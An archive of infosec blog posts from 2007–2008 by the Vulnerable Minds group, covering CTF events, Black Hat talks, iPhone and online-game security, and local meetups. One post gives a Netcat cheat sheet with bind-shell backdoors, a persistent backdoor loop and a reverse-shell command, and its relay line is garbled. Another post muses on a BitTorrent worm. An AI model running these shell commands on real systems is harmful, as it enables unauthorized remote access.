Vulnerable Minds

SDL & MS08-078

2008-12-26T19:08:00.000-05:00

I really enjoyed this article by the Microsoft Security Development Lifecycle team about how the SDL affected (or more importantly didn't affect) the recent IE 0-Day that gave a lot of people some sleepless nights recently. I may be becoming a Microsoft Security fanboy, even if I don't really like their OS. Their williness to be open, and being honest about their failures and how to correct them makes me feel far better than Apple's continuous "nope, we're still perfect" mentality, undeserved as it is.

That said, HD Moores use of the techniques develped by Alex Sotirov and Mark Dowd to render most of Microsoft's protections useless was scary to see released. I'm not ready, with todays level of attackers, to go back to a Win2k level of (in)security. Or maybe I am....

How to rescue orcs and spaceships

2008-03-16T21:31:00.003-05:00

Hello, my name is Scott, and I'm a gamer. Sometimes it keeps me up way too late at night, but I care about my pretend space ships and the billions of Interstellar Kredits I've earned with them, and I'd be pissed if something happened to them.

A bit nerdy I realize, even for an information security blog, but it's true. There's no way to deny it, I do enjoy my online games. The fact is though I'm far from alone. Millions of people have been getting into one of the many massive multiplayer online games, from World of Warcraft to Second Life, from Lord of the Rings to EVE Online. Millions of people have invested incredible (some would probably say insane) numbers of hours to their wizards, pod pilots, hobbits, and a variety of other characters, constituting a huge investment of both time and money ($15 dollars a month adds up). This has become my motivation as I decided to get my GIAC Certified Incident Handler Gold certification as the focus of my practical.

I've been fascinated by the numerous security exploits in various online games. From EVE Online's database hack to Charlie Miller & Dino Dai Zovi's Second Life exploit it's interesting the unique factors that go into handling attacks in multiplayer online games. On one hand it's very much like a real economy, characters have assets, experience; money of some kind, and yet very much different (you can't exactly roll back a week of financial transactions in the real world).

As a result I've chosen to make my practical for getting my GCIH Gold certificate a study on Incident Handling in online games focused on case studies of actual handling by various game operations teams. Here's my abstract:

While generalized incident handling practices are essential to any system or network they do not always meet the needs of specialized systems. These systems have needs that go above and beyond the usual, and must be handled with unique attention to specific hosts, their functions, interactions, and overall system architecture. However in these specialized systems with similar functions there may be a way to generalize even the specialized requirements.

As massive multiplayer online gaming (MMORPG) continue to grow, through games like World of Warcraft, Second Life, and EVE Online, the amount of money being funneled into them grows as well. Where the money goes so do the criminals and as such online games are increasingly coming to light as targets for malicious attackers. Whether attacking for financial gain or to simply gain the upper hand in gameplay more and more vulnerabilities are being discovered and and exploited in online games.

MMORPGs are unique environments; worlds with their own economies and populations, players with their own experiences and assets, all of which are unique and important to the users who have invested hours upon hours into their virtual personas. This combination and complexity leads to creating vibrant and unique environments that make these games interesting to play, but also create a nightmare tradeoffs in the event that an incident handler must respond to in the event of a compromise.

This leads to a need for unique handling of incidents and thus a unique set of processes to be followed. This does not supersede the generalized handling guidelines, nor could it be completed comprehensive, but there can be a generalized incident handling guidelines for online games, a superset of generalized incident handling guidelines, such as those taught in the SANS 504 course.

To this end I would like to research and develop such a set of specialized handling guidelines, based on the proven general handling techniques from SANS, for consideration of incident handlers working on massive multiplayer online games. These will focus on the unique challenges and options available to handlers in online games, and will be based in large part from case studies of how such incidents have already been handled in current online games. Additionally it will include a survey of major online games, trying to gain as much insight as possible into how they currently structure their handling, in order to add as much real world experience into this effort as possible.

Even though it results in writing a paper and being uber-whitehat I'm kind of excited about writing this paper. Looking at attacking/defending online games is just beginning to get attention. That is somewhat surprising in itself since the online gaming industry is already doing billions in dollars yearly and continues growing. Nothing is quite as much fun as breaking new ground.

So now for you, my readers, I have a request: What are your thoughts and insights, on my abstract for my paper and on the topic in general. I'm very eager to hear what you have to say. Feel free to leave comments, send email (scott.roberts[at]vulnerableminds[dot]com), send a carrier pidgion, I'm interested to hear what you have to say.

Congratulations

2008-02-17T21:25:00.002-05:00

Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. Now Mike was last years champion, and tied for first, but it was Tim who came in with the fastest time, and was this year's Hack or Halo winner.

Congratulations to Tim and everyone who participated.

CTF is coming & VM is recruiting

2008-02-07T00:29:00.000-05:00

It may be a couple months away but Vulnerable Minds is getting read for one of the best parts of the year. No, not Christmas, Defcon. Say what you want about the Rivera, but Defcon is definitely one of the biggest events in the hacking community. Last year Vulnerable Minds competed for the first time in the Defcon qualifier, hoping to earn a spot to play CTF in Vegas.

Vulnerable Minds put in a good effort and did well for our first attempt. Out of 170 teams participating we ended up placing 30th, besting a number of very talented teams.

So now it's time to turn our thoughts towards this years competition. Vulnerable Minds is looking to build off last years strong showing and do even better this year. To that end we are looking for talented hackers interested in playing CTF, qualifying, and going to DefCon to play. Reversers, sploit coders, forensics gurus, even defensive specialists. DC area is preferred.

Not sure if this is your cup of tea? Check out information about qualification and CTF from the past two years from the L@stplace team (Winners the past two years at Defcon).

Interested? Fill out this handy contact form and we'll get in touch with you.

Nasty Idea of the Night: Bittorrent "Worm"

2008-01-16T20:25:00.000-05:00

It's been awhile, but then again, it's always been awhile, but I digress.

So a nasty idea popped into my head tonight. Imagine attacking a BitTorrent by finding a buffer overflow in the client software and each host compromised checks it's peer list and compromises all those as well? Add extra nasty and have the payload also check for other torrents and send the exploit payload to those as well.

Interesting points:

Could move incredibly fast.
Complicated issues with client vulnerabilities vs protocol vulnerabilities. Unlikely to write an attack that works universally.
Price the RIAA would pay for such a thing? *What's the keystroke for infinity*
Tracker vulnerabilities.

Just a random thought. More to come.

Introducing Pulse

2007-10-15T14:08:00.001-05:00

Well if you've been doing DNS zone transfers on VulnerableMinds.com then you know, but for the rest of you Pulse has been a mystery. Begun as Project Tango Pulse was meant to do one thing; give you a summarized, quick, complete look at the status of the information security threat landscape. It's a simple concept, but a lacking resource on the Internet.

Pulse came out of my own needs as a threat analyst. Work leaves me with no shortage of projects, research, emails, meetings, and yet the imperative need to have a complete view of what vulnerabilities, exploits, and malcode affecting all platforms. RSS feeds were a good start, but I quickly found myself reading dozens of feeds a day, many filled with useless information. Many I was able to replace or weed out, making it easy to get general news and the opinions, but I still needed more. I still needed information about threats, vulnerabilities and the code to exploit them, but struggled with so many feeds, and I still spent a huge amount of time reading unimportant information.

To this end I decided I needed a tool of my own, something to bring together all these feeds that bring into one place and yet eliminate the chaff, the low threat, the endless mailing list responses; the unnecessary.

The result is Pulse.

Now Pulse is a huge part of my daily workflow. I start my day with it, along with SANS Internet Storm Center and Arbor Networks Atlas portal. I feel that this combination gives me all the information I need to know to be on the "pulse" of the infosec threat landscape.

I'll quit waxing philosophical about the why's and hows. It's straightforward, but I feel like it meets a need that isn't easily being filled by other services available on the Internet. So take a look, use it, enjoy, and feel free to send me feedback. Pulse isn't done, it's not finished, it's just beginning. To find out more:

Introduction to Pulse - Presentation
Project Tango Specification - Document

Took long enough...

2007-10-11T19:25:00.000-05:00

No, I'm not talking about how long it's been since our last blog post, I'm talking about the iPhone.

I can't say I'm really surprised, except that maybe it took so long, but the iPhone hacking teams have announced a major remote exploit for the iPhone/iTouch. A file parsing exploit, the way we many of us expected it would happen, this is remotely exploitable via a malicious .tiff file. It appears that this was created to make it possible to remotely unlock iPhones (a dubious prospect at best).

For all the interest that the information security community had in the iPhone before it came out I've been shocked at how little has come out of our community. It's shocking how the majority of the "exploit" activity on the iPhone has been the traditional hackers, those who just seek to expand functionality. These "hacks" have been created to compensate for the lacking API, not those attempting to compromise this information rich device. Maybe good is stronger than awesome.

More info here and the actual malicious tiff here.

Love, as they say, is dangerous.

2007-08-18T22:07:00.001-05:00

As mentioned previously (and in a Defcon debriefing post that I have yet to actually publish), I've been looking into malware analysis and reverse engineering lately. There is still so much to learn, but what humble little I have learned has whetted my appetite for something more hands-on.

By the way, I have finally discovered and fallen in love with Eldad Eilam's book, Reversing: Secrets of Reverse Engineering. Its collective 624 pages has a good balance of breadth and depth, and though I haven't finished it from cover-to-cover yet, I am already jumping the gun and recommending it to anyone interested in reversing. As the book has a good amount of assembly code, some background knowledge is advised, unless you're the type who likes to be inundated with information about things you can just barely understand, like doing 0 to 60 in 3 seconds flat.

At any rate, in my quest to look for something to analyze, I discovered that one easily accessible treasure trove of malware and fishy (phishy! sorry, that was punny) sites is my spam folder... which is where I found this one:

"I`m in hurry, but i still love you...?" Aw, I feel the warm fuzzies! Especially when said ecard (which has javascript code running in the background, so I don't recommend you going to this link unless you know what you're doing) looks something like this...

Humor aside, I am somewhat surprised by the sloppy effort of the attempt, especially when simple copy-pasting could have made it somewhat more convincing. This was obviously not a particularly brilliant example of social engineering technique, but it was entertaining nevertheless.

Since Defcon...

2007-08-12T12:32:00.000-05:00

Sorry for the complete lack of updates from me since Defcon. I've had plenty to write up, share, and rant about (as is my want), but I'm in somewhat of a tenuious circumstance regarding my blogging, so I figure better safe than sorry, and thus I'm keeping my comments to a minimum. Hopefully some of the other Minds will pick up the slack. We shall see.

BLACK HAT field report #2: Don't tell Joanna the virtualization rootkit's dead

2007-08-01T13:19:00.000-05:00

Thomas Ptacek & Nate Lawson talk about Hypervisor rootkits work and why they are detectable, maybe even more so then Kernel rootkits.
Thomas and Nate created a hypervisor rootkit called 'Vitriol' for OSx (Very similar to 'BluePill' for Vista) to test their virtualization rootkit detection methods. This all stems from a debate between them and Joanna Rutkowska that's been going on for a year. Ultimately she didn't give them permission to try to detect 'BluePill' on stage, so here we find ourselves.
'Vitriol' is similar but not identical to 'BluePill', it's less weaponized and more of a proof of concept. 'BluePill' was made for the AMD architecture. 'Vitriol' doesn't hook the network, and has a less stealthy loader.
After a 'Vitriol' vs. 'BluePill' comparison there was a discussion on the detection of virtualization in general, behavior or state changes introduced by hypervisors, also timing variations introduced by a hypervisor. Virtualized malware can be detected by examining the cross section of the hyhpervisor vs. the OS and how much the hypervisor needs to exactly emulate the OS to remain undetected.

Detection:
Strategy One - Side channel Attacks
VM overhead creates detectable 'trails' through microarchitecture that are hard to conceal.

Strategy Two - Vantage point Attacks
VM cross-section forces it to recognize and emulate the OS/hardware.
problem: Talk directly to the hardware(which will betray you), or emulate the hardware, with perfect fidelity.
Performance Event Counters: instructions retries, cache misses, branches, etc.
HPET counters, ACPI timers, and MSR's would all need to agree for attackers to win.

Strategy Three - Vulnerability attack
Finding Hypervisor Bugs

Conclusions: how to make it harder for attackers
Introduce data-dependence (many heuristics)
Force to emulate microarchitecture (branch buffers, etc)
Force them to Emulate Obscure Features (HPET, PerfCounters, AGP GART)
Tie them to a single architecture (intel VT, Op Roms, etc.)

www.matasano.com/log

Black Hat Field Report #1: Design Review of the Web - Kaminsky

2007-08-01T12:21:00.000-05:00

Dan Kaminsky takes a closer look at some interesting aspects of 'Wed 2.0'.
Using 'Slirpi' (back from the dead) VPN'ing into Protected Networks With Nothing But A Lured Web Browser.
The fundamental design of the web is late binding, pieces are pulled together and assembled at runtime, independent from one another. So as soon as independence was established, people wanted to be able to create dependencies ("you read my page, I read your mail")
DNS Pinning still works?
Dan demonstrated an extension of RSnake that grants full IP connectivity, by design, to any attacker who can lure a web browser to render his page.This used to be taken care of by Same Origin Policy, which attempts to restrict scripting and other forms of enhanced access to sites with the same name. But scripts are not acquired from names, they come from addresses.
Dan also demonstrates how Slirpie can cut through some implementations of Single Sign-on.

All the networking you could need: Netcat

2007-07-31T23:32:00.000-05:00

So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.

We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:

Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]

Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]

Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe

Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done

Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]

Backdoor Client:
nc [server ip] [port]

Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe

Traffic Replay:
nc [targetip] [port] < [filename]

A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.

At least we're learning

2007-07-29T14:31:00.000-05:00

I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.

I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:

I've been in training, busy at work, and abusing Yahoo Pipes, something I'll write more about later.
Bacchus has stopped reading anything but Snort alerts, which made Bacon a bit anxious so I think he's trying to make up some new encrypted communication channel. I may help with that a bit.
ev3 has been reversing everything she gets her hands on including, I'm pretty sure, her reversing tools.
No one's really sure what Narc, GPmidi, Norris, or LogicX have been doing, but thats prolly a good thing.
Saijak seems to have forgotten how to use a computer, though with good reason.

Regardless we're all all getting stoaked for Defcon and various Minds will be making it out there Thursday and Friday. We'll be in the Riveria and around various places. More about our plans to come.

By the way check out Ed's incident handler challenges, fun stuff.

Another iPhone Security Perspective

2007-07-10T20:05:00.000-05:00

Alright, I promise, last iPhone post, at least from me.

The fine folks over at Symantec's Security Response group are apparently taking a look at the iPhone from a "Wouldn't it be fun to land malicious code on this" perspective and seem to have more confidence than I did initially (See: iPhone sounds atlot like iPwn), and with good reason. It would seem that Apple hasn't been as caviler with their AJAX/iPhone integration as early reports suggested. For now that seems like good reason, but as the iPhone gets opened up further and further, either by Apple or by intrepid hackers, that may change.

So give the Symantec article a read, and enjoy your iPhone. We'll be coming for it soon...

iPh0n3: And so it begins...

2007-07-06T08:32:00.000-05:00

From TUAW:

"iPhone enthusiasts over at the #iphone-talk and #iphone-mac channels on irc.osx86.hu have developed iPhoneInterface, a new Windows and Mac tool that allows you to manipulate the iPhone's state, launch services, and interact with the iPhone filesystem. With it, you'll be able to scan the iPhone file structure, create and remove folders, start iPhone services, and more."

I don't think anyone is really surprised that this happened I know many people who believe that Apple actually encourages this type of behavior, evidenced by the easy of cracking into the AppleTV and the numerous enhancements that followed. I don't know if I quite fall into that camp, but I do think it's inevitable that any closed system that gains interest from so many technically inclined people will not stay closed for long. I don't know if that's really a statement about security, or just common sense.

Protection/hackiblity philosophy aside I'm excited to see where this goes as I get ready to throw down my own $600 to Apple/AT&T. Take the already impressive iPhone, throw in a healthy helping of the great features you get in regular OS X, and add in some of the features found in other high end phones, and you really have a be all device. Truth be told I'd actually be reluctant to use such hacks on my main phone, but my real hope is that this kind of thing encourages Apple to open up the iPhone, add the features people have been asking for, and make it a lil hacking pad that I can also get email and make calls on.

That being said I think SSH and the ability to browse the filesystem are a must, but how about a Python interpreter or something? Flash maybe? A Safari view source option? TextMate for iPhone? Are you listening Apple? I want to be able to play next year's CTF qualifier on the Metro.

Closure to Disclosure

2007-07-04T21:11:00.000-05:00

There's been a fair bit of discussion lately about disclosure policies of various groups and people in information security. This isn't new, or really a surprise, disclosure is something that comes up every few months, every conference, and other random times based on the alignment of Jupiter and Tim's hairstyle. I plan on throwing my opinion on various topics out there, but first I felt it would be most appropriate to make Vulnerable Minds disclosure policy a matter of record. I admit we borrowed heavily from the fine folks at Matasano Chargren, but after our own discussion, modification, and consideration we feel that this document represents the best way of handling vulnerabilities; for us, for vendors, and for the computing community as a whole.

CapSec Recap

2007-06-29T16:31:00.000-05:00

As I posted at quite short notice yesterday was the initial meeting of CapSec, the CitySec group of DC being started by Matasano Chargen member Dan Moniz. I'd corresponded back and forth with Dan a few of times on the CitySec message board, so it was a pleasure to speak with him in person, as well as the other folks who showed up.

The meeting itself was small but definitely worth while and quite fun. I showed up at the Brickskeller around 7:20 and walked in to find a table set up with a small CapSec sign. I was the third person to make it, with the grand total rounding out to five. Low attendance? Perhaps, but we all had a great time anyway. It was an excellent opportunity to actually have a nice conversation, talk with everyone, get everyone's perspective, and I genuinely enjoyed everyone who showed up.

What did we talk about you may ask? I have no idea, and that's what made it great. Everything from old jobs we've had, current trends, the iPhone, and what our favorite beers are. What was amazing was the connections that people put together throughout the night. I've always felt that the security community is small and tightly knit, and last night proved it. There were many "O I know those guys, we've hung out at " moments.

All in all it was a great experience. We work in an exciting and dynamic industry that's full of exciting and dynamic people. It's always fun to just get to hang out, be social, talk infosec, and enjoy a couple nice drinks. So my many thanks to Dan for starting this group up, I know I'll be a regular attendee.

CapSec Tonight!

2007-06-28T14:15:00.000-05:00

I don't know how I missed it considering my activity on CitySec, but tonight, June 28, is the first meeting of the CapSec security meet up. The meeting will be at:

The Brickskeller
Dining House and Down Home Saloon
1523 22nd St, NW
Washington, DC 20037

Google Map

I'm stoaked for this meeting. It should be a good time to meet up with a bunch of actual, no BS, infosec folks who care more about tech than they do about their CISSP number. So come on out and join up, it should be a great experience.

Bad Reputation vs Bad Assumptions

2007-06-25T18:56:00.000-05:00

I was wandering through my blog list today and, by way of the ever enjoyable Observations of a Digitally Enlightened Mind, came across an interesting but, in my opinion, totally unfounded and flawed article related to security.

The article in question is one where PopSci published a list of the 10 Worst Jobs in Science. Many of them are truly awful and I wouldn't wish on my worst enemy. Mind numbingly, stomach turningly bad. It was #6, nearly half way down a terrifying list, that the job in question was described.

Now I've been a Microsoft hater in my day, no question. As a security type person they've been quite the headache at various times, and as an Apple fan I don't really find it an enjoyable system to use. That being said if Microsoft were to track me down and ask if I was interested in a job working with their security teams I'd jump at it.

Now the article is very correct about one aspect of it. Microsoft does wear a big "Hack Me" sign. It'd be nonstop pandemonium. Attacks at every angle, computer criminals gunning for you every day. If it's not the operating system it's the office suite, if it's not the office suite, it's the browser. There are few pieces of code attacked as aggressively as Microsoft's, it comes with the territory when you dominate the market place in so many genres the way they do. Microsoft should wear that "Hack Me" sign proudly, maybe with a big gold chain (that they can afford) and some bling letters.

So yes, under attack constantly. While I can't speak for anyone else that's exactly why I'd want to work for them, and I think that's perfectly natural. Surgeons may not like people being sick or hurt, but they sure enjoy cutting them open, or so I'm told (by my uncle who is one). It's the same with information security. A week (like the past couple) with few large threats gets dull quickly. Now the week when the ANI attacks came out, that was fun. Would working for Microsoft be easy? Not in the least but rarely do people learn when they're "safe". They don't grow without challenges.

If I wanted easy I'd go be a security guy for a small mom and pop somewhere, nice and safe, with a small number of supported apps, a smaller number of machines, and five users I could personally beat for being stupid. The Microsoft's, Amazon's, Mozilla's, government groups and financials are in the thick of it, defending dozens of complex pieces of software, hundreds of thousands of machines, and billions of dollars. The Internet is a very dangerous place for groups like those and I believe that's the most attractive reason to work for them.

A different take on Information Warfare...

2007-06-23T11:48:00.001-05:00

Always understated and insightful I really recommend checking out Michael's recent article on Information Warfare over at MCWResearch. Now I'll admit I really enjoy exploring the topic of Information Warfare, and I'm also quick to admit that I like that Michael seems to share my take that information warfare is coming for us all, government and corporation alike, and so it's time, as Michael put it, to "...start digging trenches."

I realize my reaction to this subject is to get too fired up for most people to take seriously. It's a failing of mine, but I'm passionate about this and can't help it. I truly feel that all of us, every mom and pop company to Fortune 500's to home users are going to be combatants, either innocent, unwitting, or otherwise, in information warfare, and we need to prepare accordingly. Packets don't often kill people directly and kill -9 rarely has a physical effect on structures, and thus it's easy to dismiss what nation states do in the farthest reaches of the Internet as hardly being "warfare" but it's ludicrous to think that it can't have real world ramifications.

I'm already getting too far up on my soapbox, so again, I really recommend checking out the post at MWCResearch, it's really good stuff.

iPhone sounds alot like iPwn

2007-06-13T19:20:00.000-05:00

So as a fairly enthusiastic Apple fan I've been getting asked often how excited I am for the iPhone ("Very"), am I going to get one ("prolly sometime in July"), and if I think it will be that great ("I do"). With someone of a basic technology background this is usually followed by some question about applications, SDKs, and if I think Apple will open it up ("I do") to third party development.

My overall take on it? I've had a number of smartphones and aside from making calls I mostly just used the browser. As for other applications after a few that I tried for experimenting I found I rarely used others, just sticking to the basic software that was included, and even that little enough.

As for the iPhone I truly believe that the killer app will be Safari itself, if it's all that Steve has tried to demonstrate it, may or may not, be cracked up to be. I'm not really sure what applications the developers who are attacking Apple for not providing an SDK think they'll create. In the years of Palm/Windows Mobile/Symbian/Blackberry smart phones I've yet to see an app that overwhelms the function of a phone to make calls, text message, and maybe, if you're lucky, get email or browse the web. All of these are functions the iPhone will do out of the box. Even on my MacBook many of the most important things I do, blogging, reading RSS feeds, getting security news, are all things done in the web browser alone. What app are Apple devs just dying for the chance to make?

Now that multi paragraph rant is not to suggest I'm peachy about the whole thing. This is a security blog after all. By not creating an SDK for creating true applications or widgets, and instead relying on Javascript/Ajax (as though you can have one without the other) you lead to a new problem, web pages can have amazing integration with your personal phone. Let me rephrase that: Advanced applications, running from remote servers, with both instructions and data, that's been shown already to have concerning security issues, will be able to run on your iPhone, and have, in some way, access to your address book, iTunes, and the ability to make phone calls. How was this a good idea?

One of the few inherent security mechanisms built into web browsers is that they, to some extent, exist in a sandbox. Most of the time Javascript can't access the OS file system, it can't control applications other than the browser, it can't access system resources, and all those are only most of the time. There are plenty of side effects to current web technology that make a security researcher pull their hair out, and that's all in the sandbox. Billy Hoffman's Shmoocon presentation discussed many of these, from keylogging to his own technique for web scanning using just Javascript and his particular brand of maniacal thought.

It would seem, based on current information, Apple is deliberately adding such features creating a potential security nightmare, deliberately adding the ability for web applications to circumvent the sandbox. So what will happened? XSS attacks that rewrite your Addressbook? A hidden iframe that calls 911 for you? Who knows really, but when "webapps" can access system functions it's hard to imagine it staying innocent. Now it's very possible, and I'm in fact hopeful, that Apple has considered these things and put protections into place, but even so it is easy to suppose that this would be a thin veil of separation, and the possibility for misuse could easily be close to the surface.

For a company like Apple, who so often touts their security record (no I will not digress into a discussion of Safari now (but yeah, wow, 2 code execution vulnerabilities in a day?)), to not aggressively market that aspect makes me wonder how much consideration that aspect of design received. All of this is obviously speculating the worst, but as Apple has messaged little to nothing about the security features of the iPhone, leaving everyone to evaluate what they see. And based on what we see of the iPhone's design what else are security researchers to assume?

Or maybe I'm the only one who is worried about all this.... well, there's also Billy.

And the answers please...

2007-06-10T14:01:00.000-05:00

Over at Nopsr.us the Underminers (aka 1@stPlace, winners of last years Defcon CTF) have put up a follow up to last years CTF quals writeup, which you can find here.

@tlas and his gang do a fantastic job walking through each of the challenges, and a lot can be learned from just taking a look. Even better, they managed to pry the challenge source code out of Kenshoto's hands (a feat they managed to pull off before I did) and have it posted, so that nearly the entire scenario can be recreated for ownage pleasure in your very own home. So go give it a look, you'll learn a bunch.

For those who are curious, Vulnerable Minds did play this year and were quite pleased with our 30 out of 160 finish. In what is the largest Defcon qualification year ever we were stoaked to come the top fifth and had an awesome time. ev3, Narc, LogicX, Bacon, Gpmidi, Bacchus, and myself spent most of the weekend at Akolyte and Saijak's apt, chugging Red Bull, watching Jurassic Park on repeat (seriously Pwnage100 was crap), and hacking to our hearts content. It was a great weekend, the challenges were excellent, tough but enjoyable, and it was one of the most fun and interesting events I've been a part of.

So props to the Kenshoto guys for an fantastic quals round, to the NopsR.Us/Underminers/1@stplace guys for the fantastic writeups, and to the Minds who dedicated their weekend to playing a fantastic game.

And watch out next year because Vulnerable Minds is coming to break all of your plates!

Love of the game.

2007-05-26T17:08:00.000-05:00

So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)

This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... I can't think of a better way to spend a random summer weekend, but that could just be me. ;)

In preparation, I've been looking over last year's quals, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...

But the future can wait. This weekend, let teh funz beg!n.

Getting Involved: CitySec, OWASP, and SUGs! O MY!

2007-05-23T08:58:00.000-05:00

It's been an amazingly busy time for the Vulnerable Minds. Plans for Defcon, CTF, Projects, papers, all of them are sucking up time. I have had multiple blog posts in the queue waiting to be finished and posted in all their glory, but I wanted to make a quick post to highlight something that's been important to me lately.

The image of the lonely hacker in a basement is quickly disproved as soon as you meet the very social characters that make up most of the hacking community. As happy as they are sitting around hacking on a neat piece of code they're just as happy going out for a beer and talking about that piece of code with others who share they're interests. Any conference is as much about the old friends you meet up with and the new friends you'll make as it is about the technical knowledge you'll gain.

Cons are, depending on your travel schedule and availability, few and far between for most and as a result smaller interest groups have been forming all over the country to support the desire many hackers/infosec professionals have to mix with their peers, share ideas, network, socialize, and just generally cause trouble. Much like 2600 a few years ago these groups seek to give people those opportunities.

Thomas Ptacek has been a huge proponent of these groups, and as such has organized CitySec, a small bulletin board meant to help form and nurture such groups, which I've been happy to be involved in, advocating a Washington DC meetup. Well before the CitySec site was even live Richard Beijtlich, along with other security professionals, started NoVASec (Northern Virginia) as a group for those interested in pure security, and less interested in discussing their CISSP number and GIAC scores and more into talking about what they're actually doing, could meet and talk about security. NoVASec has been excellent, just a bit of a stretch to get to as it's usually fairly far outside Washington DC proper.

Many other groups are also meeting regularly. OWASP has regular meetings, such as those in Washington DC, in various cities for developers, admins, and security folks interested in webapp security. For those more of the CISSP/Security Management mindset there are groups like ISSA-NoVA. The black or grey hat oriented crowd still has more than a few chapters of 2600 that still seem to meet, though I gather they're waning a bit. I'm also known to show up at a Snort Users Group meeting or two, though sadly the NoVA group hasn't had a meeting in a few months. Even many colleges are getting involved, with groups like the Penn State Information Assurance Club, and a similar club at RIT who's name I completely fail to remember.

I guess what I'm trying to say is that it's great the community that's coming up around various areas of the security field, and I've been happy, and encourage others in the security community, to get involved. I speak from experience when I say many of them are just as much fun as the larger conferences, and make great places to make new friends, make contacts, have a good beer, and occasionally learn something.

Time for a Tango

2007-05-19T15:25:00.001-05:00

Well I've had a number of people curious about Project Tango. It's been going for a little over a week now, much of the initial work has been completed, and now I'm in the process of tuning some of the back end pieces for finalization and release.

So at this point I'm asking for some help, and in the process am going to give away a few things about the project, so here ya go:

Are you a security professional who's an information junkie? Shoot me an email and let me know what you look for in getting your fix. What sites you read, what information you want, what information you don't want, and if you'd be interested in the Tango Beta.
Are you a security professional using RSS to feed your information needs, whether addict level or more of a recreational RSS user? Shoot me an email, pet peeves, wants, information you don't or can't get via RSS, and if you'd be interested in the Tango Beta.
Are you just really curious about what Project Tango is and want to make a compelling case to get in on the beta? Shoot me an email.

All email can be sent to tango.beta@vulnerableminds.com and we'll set you up for an early look at Project Tango.